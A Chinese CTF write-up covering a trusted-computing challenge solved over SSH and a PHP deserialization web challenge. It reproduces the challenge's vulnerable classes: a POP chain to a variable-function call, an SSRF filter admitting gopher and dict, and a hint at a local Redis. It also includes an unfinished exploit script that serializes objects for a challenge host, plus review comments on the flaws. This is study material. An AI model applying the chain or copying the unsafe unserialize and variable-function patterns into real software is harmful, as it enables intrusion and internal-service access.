可信计算
基于挑战码的双向认证1
可信计算赛题-双向认证挑战模式.docx
使用下面的命令通过 SSH 登录:
ssh player@8.147.131.156 -p 18341 # 记得加上-p参数指定端口,不然默认的是22端口
看见word文档的提示,先尝试一下
直接获得了flag1
web
魔术方法__get()、__set()和__call()的用法
hint.php
<?php
// Challenge hint string. Its wording appears to point at a Redis service on
// 127.0.0.1 rather than a database (inferred from the text only).
$hint = 'Not db,but 127.0.0.1!!!redis-flag{really}';
// Print this file's own syntax-highlighted source into the response.
highlight_file(__FILE__);
?>
这道题只做到这里(下面的脚本尚未完成):
<?php
// highlight_file(__FILE__);
include "function.php";
/**
 * Challenge class "Rd", reproduced from the CTF source.
 *
 * It declares no regular methods, only the magic methods __destruct() and
 * __call(). All three properties are public and untyped, so a deserialized
 * instance carries whatever values the serialized input supplied.
 */
class Rd
{
public $ending;
public $cl;
public $poc;
// __destruct() is the destructor, the counterpart of the constructor: PHP runs
// it automatically when the object reaches the end of its lifetime (for example
// when the function that holds it returns).
public function __destruct()
{
echo "All matters have concluded"."</br>";
}
// __call() is invoked automatically when an inaccessible method is called on
// the object. $name is the method name that was used, $arg the argument list.
public function __call($name, $arg)
{
// The loop body never reads $key or $value; every iteration re-tests the same
// element, $arg[0]['POC'].
foreach ($arg as $key => $value) {
// Loose comparison (==) against the string "0.o".
if ($arg[0]['POC'] == "0.o") {
// Property write on whatever object $this->cl holds. "var1" is declared by
// none of the classes in this file, so on an object that defines __set()
// PHP routes this write to that method.
$this->cl->var1 = "get";
}
}
}
}
/**
 * Challenge class "Poc", reproduced from the CTF source.
 *
 * Both properties are public and untyped, so a deserialized instance carries
 * whatever values the serialized input supplied.
 */
class Poc
{
    public $payload;
    public $fun;

    /**
     * Magic method: PHP calls __set() automatically when code assigns to a
     * property that is undefined (or not accessible) on the object.
     *
     * Records the property name in $payload and the assigned value in $fun.
     */
    public function __set($name, $value)
    {
        [$this->payload, $this->fun] = [$name, $value];
    }

    /**
     * Prints a fixed message, then reads the given path or URL and discards
     * the result.
     *
     * NOTE(review): file_get_contents() accepts stream wrappers as well as
     * local paths, so the argument should never be taken from untrusted data.
     */
    public function getflag($paylaod)
    {
        echo "Have you genuinely accomplished what you set out to do?</br>";
        file_get_contents($paylaod);
    }
}
/**
 * Challenge class "Er", reproduced from the CTF source.
 *
 * NOTE(review): __set() calls a function whose name is the assigned value and
 * passes it $this->Flag after only a pattern check. On a deserialized object
 * $this->Flag comes from the serialized input. A hardened version would call
 * one fixed function instead of a variable one, and would validate the decoded
 * URL against an allowlist of schemes and hosts.
 */
class Er
{
public $symbol;
public $Flag;
// __construct() is the constructor: it is called once when the object is
// created with new.
public function __construct()
{
$this->symbol = True;
}
// __set() is a magic method that PHP calls automatically when code assigns to
// an undefined (or inaccessible) property of the object.
public function __set($name, $value)
{
// The check runs on the base64-decoded Flag. The scheme group is optional
// ("?"), so the pattern only requires the text to start with "://" or with one
// of the four listed schemes followed by "://". The list is wider than
// http/https: it also admits gopher and dict.
if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',base64_decode($this->Flag))){
// $value is used as a function name and receives the still-encoded Flag.
$value($this->Flag);
}
else {
echo "NoNoNo,please you can look hint.php"."</br>";
}
}
}
/**
 * Challenge class "Ha", reproduced from the CTF source.
 *
 * All three properties are public and untyped, so a deserialized instance
 * carries whatever values the serialized input supplied.
 */
class Ha
{
    public $start;
    public $start1;
    public $start2;

    /**
     * Constructor: called once when the object is created with new. Prints
     * $start1 (as a string) followed by a fixed marker.
     */
    public function __construct()
    {
        echo "{$this->start1}__construct</br>";
    }

    /**
     * Destructor: PHP runs it automatically when the object reaches the end
     * of its lifetime (for example when the function that holds it returns).
     *
     * NOTE(review): Love() is defined by none of the classes in this file, so
     * the call depends entirely on what object $start1 holds. Doing work on
     * object properties inside a destructor is what makes a class risky to
     * expose to unserialize() on untrusted input.
     */
    public function __destruct()
    {
        if ($this->start2 !== "o.0") {
            return;
        }

        $receiver = $this->start1;
        $receiver->Love($this->start);
        echo "You are Good!</br>";
    }
}
/**
 * Base64-decodes $url, fetches it with cURL and dumps the decoded URL, the
 * transfer info and the response body with var_dump(). Returns nothing.
 *
 * NOTE(review): the function itself places no restriction on scheme or
 * destination host. Code that fetches caller-supplied URLs should limit the
 * schemes (CURLOPT_PROTOCOLS / CURLOPT_REDIR_PROTOCOLS with
 * CURLPROTO_HTTP | CURLPROTO_HTTPS) and reject loopback and internal
 * addresses before the request is made.
 */
function get($url) {
    $target = base64_decode($url);
    var_dump($target);

    $handle = curl_init();
    curl_setopt_array($handle, [
        CURLOPT_URL => $target,
        // Return the body from curl_exec() instead of printing it directly.
        CURLOPT_RETURNTRANSFER => 1,
        // Leave the response headers out of the returned body.
        CURLOPT_HEADER => 0,
    ]);

    $body = curl_exec($handle);
    $transferInfo = curl_getinfo($handle);
    var_dump($transferInfo);
    curl_close($handle);
    var_dump($body);
}
# POP chain
#
// NOTE(review): the four objects below keep their default property values and
// are never linked to one another; only $h is serialized.
$r = new Rd();
$c = new Poc();
$e = new Er();
$h = new Ha();
// Serialize the payload
$payload = urlencode(serialize($h));
echo $payload;
// Send the payload to the target site
// NOTE(review): $data and $context are built here but are not passed to
// file_get_contents() below.
$data = [
'pop' => $payload,
];
$url = 'http://eci-2zece18v7toobwov2hoa.cloudeci1.ichunqiu.com/'; // replace with the target site's URL
$options = [
'http' => [
'method' => 'POST',
'header' => 'Content-type: application/x-www-form-urlencoded',
],
];
$context = stream_context_create($options);
$response = file_get_contents($url);
// Print the response
echo $response;
// The commented-out lines below look like the challenge's server-side entry
// point: the raw 'pop' POST field is handed straight to unserialize(). That
// call is the root cause. Request data should be decoded with json_decode(),
// or at the very least unserialize() should be given
// ['allowed_classes' => false] so that no class instances are created.
// if (isset($_POST['pop'])) {
// $a = unserialize($_POST['pop']);
// } else {
// die("You are Silly goose!");
// }
?>